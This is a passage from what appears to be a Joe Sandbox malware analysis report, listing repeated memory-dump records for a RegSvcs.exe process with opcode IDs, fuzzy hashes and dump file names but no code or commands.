                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction ID: 7bd1d72aae6e16c2b903a27439403c1f7f86a8ee32d6fc3f3ae043e0f9b330ae
                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction Fuzzy Hash: DAC01232290648AFC712AA98DD02F427BA9EB98B40F000021F2048B671C635E920EA84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 560c2847e2b4daab8fabc945da4054ba1cb178f3f8264a975cbe554ffed8f557
                                                                                            • Instruction ID: 0a636925bc53d86c7feac3fd959c25aea8236fc2779cece619758f5465513b87
                                                                                            • Opcode Fuzzy Hash: 560c2847e2b4daab8fabc945da4054ba1cb178f3f8264a975cbe554ffed8f557
                                                                                            • Instruction Fuzzy Hash: E6C04CF7B110A0AA8714DB619805B76758A93D5301F45C069B1A9C6148DA3FC401AA64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction ID: 5ce0f3d3b197473fe25212292d7614164be1b0149d1f09c9e4408cbe79f75d9c
                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction Fuzzy Hash: 20D01236100248EFCB01DF41C890D9A772AFBC8710F508019FD1907611CA35ED62DA50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction ID: 1002cbe19735b7ac597ce781fc831a44117540e36f9eb93316ce0e23e910baca
                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction Fuzzy Hash: 4AC04C757015458FCF15DB19D795F4577E4F744750F150890E805CB721E724FD01DA10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2bcde72a48987cda9e05cb18894558b581f6d66ed1014cda4d504addc06c8326
                                                                                            • Instruction ID: 199a32aab5e0b2578fd4e6a743eb73ac95ad9e66f9600a2c68d472326d8aed90
                                                                                            • Opcode Fuzzy Hash: 2bcde72a48987cda9e05cb18894558b581f6d66ed1014cda4d504addc06c8326
                                                                                            • Instruction Fuzzy Hash: D890023160580122924071598985A46400597E0341B55C026E0424554D8E198A576361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe54f9643be165f00af676392167d74efb598cb58e4728d8b34feceaee9aed57
                                                                                            • Instruction ID: e251afa8333ef9c0a9075f5cfa494c79900d498e8a93cbf5ea8ec03aa823952b
                                                                                            • Opcode Fuzzy Hash: fe54f9643be165f00af676392167d74efb598cb58e4728d8b34feceaee9aed57
                                                                                            • Instruction Fuzzy Hash: 7790026160150152424071598905906600597E1341395C12AA0554560D8A1D8956A269
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37b48f42b23d19792e54fa914450baf6b87684b48cb722a23df3a0443c8a39db
                                                                                            • Instruction ID: ebd761d3fc866da883a5088b339a027de83f27527258f94f065a50313fe2decf
                                                                                            • Opcode Fuzzy Hash: 37b48f42b23d19792e54fa914450baf6b87684b48cb722a23df3a0443c8a39db
                                                                                            • Instruction Fuzzy Hash: BB900225221401120245B5594705A0B044597D6391395C02AF1416590DCA2689666321
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70f8a3096735f774ed7d1df2008235f3234813ab998dcf4c5e9ea8b07b51b342
                                                                                            • Instruction ID: 99eb4c3a220f288b4c67c36a758504f9db74ebe474d3626f9c9ca70bf68483c6
                                                                                            • Opcode Fuzzy Hash: 70f8a3096735f774ed7d1df2008235f3234813ab998dcf4c5e9ea8b07b51b342
                                                                                            • Instruction Fuzzy Hash: DB9002A1201541A24600B259C505F0A450587E0341B55C02BE1054560DC92A8952A135
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 901e9813865d6156d14b646b5e8568b3cdf80b1ab2a999b1c6d0e4e7c00b025e
                                                                                            • Instruction ID: 5e8201d9aeaf953534879c85dd91c39d4b2a92468df0dbdfc6d44bdb4a224a08
                                                                                            • Opcode Fuzzy Hash: 901e9813865d6156d14b646b5e8568b3cdf80b1ab2a999b1c6d0e4e7c00b025e
                                                                                            • Instruction Fuzzy Hash: F290023120544952D24071598505F46001587D0345F55C026A0064694E9A2A8E56B661
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58079957634caf520aa5578f9e11ebea291a151fbd8f9cfdd31692a60a6432c1
                                                                                            • Instruction ID: 2570fffeecd42f50bf4140091a2858a18c779015a40dc8e5d4a16874ec804ae5
                                                                                            • Opcode Fuzzy Hash: 58079957634caf520aa5578f9e11ebea291a151fbd8f9cfdd31692a60a6432c1
                                                                                            • Instruction Fuzzy Hash: 2790023160540912D25071598515B46000587D0341F55C026A0024654E8B5A8B5676A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: faee87bab6a1a31dc814febda3b7b220fa2f5a242cf6aaa8b11f7b368bc9d8eb
                                                                                            • Instruction ID: c52b8c2ea6cb0448a13ae86904d3200316a9ae1f5e9c4558db1169e76f863348
                                                                                            • Opcode Fuzzy Hash: faee87bab6a1a31dc814febda3b7b220fa2f5a242cf6aaa8b11f7b368bc9d8eb
                                                                                            • Instruction Fuzzy Hash: BC90023120140912D20471598905B86000587D0341F55C026A6024655F9A6A89927131
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 03933079a2ff41feb9591ce3649a9db34f71425ffbdcd38bbd4de103378d2227
                                                                                            • Instruction ID: cdf690bd7675f01a11469aba6155187fe744885e3dacc795f25322d39552744d
                                                                                            • Opcode Fuzzy Hash: 03933079a2ff41feb9591ce3649a9db34f71425ffbdcd38bbd4de103378d2227
                                                                                            • Instruction Fuzzy Hash: D290023120140513D20071599609B07000587D0341F55D426A0424558EDA5B89527121
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be6033f21e24675d02078283ef775afa1d477a704b091b93622302e822995747
                                                                                            • Instruction ID: eb524d8636deaa8c73fbff1303b8c3c13fcbf98c95167879a392f810e9c82eaa
                                                                                            • Opcode Fuzzy Hash: be6033f21e24675d02078283ef775afa1d477a704b091b93622302e822995747
                                                                                            • Instruction Fuzzy Hash: 8E90022160540512D24071599519B06001587D0341F55D026A0024554ECA5E8B5676A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7522e02f0a968be4c03051a6be83e5167ed1201ebc48b7826b674fcc2a59b011
• Instruction ID: 2d9a91b3821744467bf50da12439d19abfffcb0a8a76b5757fc8595650c429b5
• Opcode Fuzzy Hash: 7522e02f0a968be4c03051a6be83e5167ed1201ebc48b7826b674fcc2a59b011
• Instruction Fuzzy Hash: 9F90023120140952D20071598505F46000587E0341F55C02BA0124654E8A1AC9527521
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 509c727a14dde4a8a4a69089c7597cb2b6953f78d35a46d2d5b5ae747a186dc6
• Instruction ID: ff3ab78d864ed2b9f705e29237f75c1ed837ce562d537df43a2b5f2e7cdb05ef
• Opcode Fuzzy Hash: 509c727a14dde4a8a4a69089c7597cb2b6953f78d35a46d2d5b5ae747a186dc6
• Instruction Fuzzy Hash: 2090023124140512D24171598505B06000997D0381F95C027A0424554F8A5A8B57BA61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cfa36a31d67b36fcdbe40cf27a9c9147e0d585e1d7d7d26abfcc8e540ade7a6
• Instruction ID: ce40d0e6e5f46036ac580dd71564b47921e532af5611ed79629b37493a4aba3d
• Opcode Fuzzy Hash: 3cfa36a31d67b36fcdbe40cf27a9c9147e0d585e1d7d7d26abfcc8e540ade7a6
• Instruction Fuzzy Hash: 2390022120544552D20075599509F06000587D0345F55D026A1064595ECA3A8952B131
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e4045589d4a43b98f1b1f5acd911d7566f6634c11e494f4c6dbfc6f8864816a5
• Instruction ID: 26b299f8f03a1a5191db77788a9ea8f303587f290cbafb8c317f7a41f86ce459
• Opcode Fuzzy Hash: e4045589d4a43b98f1b1f5acd911d7566f6634c11e494f4c6dbfc6f8864816a5
• Instruction Fuzzy Hash: AE90026120180513D24075598905B07000587D0342F55C026A2064555F8E2E8D527135
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c4f2b94c5cafbd1a15159439e47342e2613e4e9387bbdb01479dde2c5a391043
• Instruction ID: c87d697994dde827cc6e8617450623ce569347987c4c6c1cc9ed48eea2aa92a9
• Opcode Fuzzy Hash: c4f2b94c5cafbd1a15159439e47342e2613e4e9387bbdb01479dde2c5a391043
• Instruction Fuzzy Hash: 3A90022130140512D20271598515B060009C7D1385F95C027E1424555E8A2A8A53B132
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cfd9012236cf71be9e0b16e5ef8e4ceb8e6f171e5df09a4d10833a045abbf85a
• Instruction ID: 338525c8f979a00768f3fd09b4a34e0654ccc076339ef4152cab07fe217c6a77
• Opcode Fuzzy Hash: cfd9012236cf71be9e0b16e5ef8e4ceb8e6f171e5df09a4d10833a045abbf85a
• Instruction Fuzzy Hash: B490023120180512D20071598909B47000587D0342F55C026A5164555F8A6AC9927531
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4732048b5f0746f4811c3fe012cef0dbf284804a22dcc9f77ee9635052fcde2
• Instruction ID: 8594fc3e491cf51992658a33475aab8f750cd3e322a2d85bb43d53e5728c91b9
• Opcode Fuzzy Hash: d4732048b5f0746f4811c3fe012cef0dbf284804a22dcc9f77ee9635052fcde2
• Instruction Fuzzy Hash: 2090026121140152D20471598505B06004587E1341F55C027A2154554DC92E8D626125
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 10c2ac234b3bbcc4646f70379129bf357c9aac232293a3b2c6cfef2689fc80de
• Instruction ID: d6706fd5cc59584028f50bead0c2467f4d2370f531631285b687946cdf35ba9c
• Opcode Fuzzy Hash: 10c2ac234b3bbcc4646f70379129bf357c9aac232293a3b2c6cfef2689fc80de
• Instruction Fuzzy Hash: B690022124140912D2407159C515B070006C7D0741F55C026A0024554E8A1B8A6676B1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e226dffb496be10f41393d83fa57324c9f92d3ab73f8d64aa16b4989defbf15
• Instruction ID: 901518b73c84797fb36e8785eecf6c0cd221d4fdf31ba9bb825f7c06924895b8
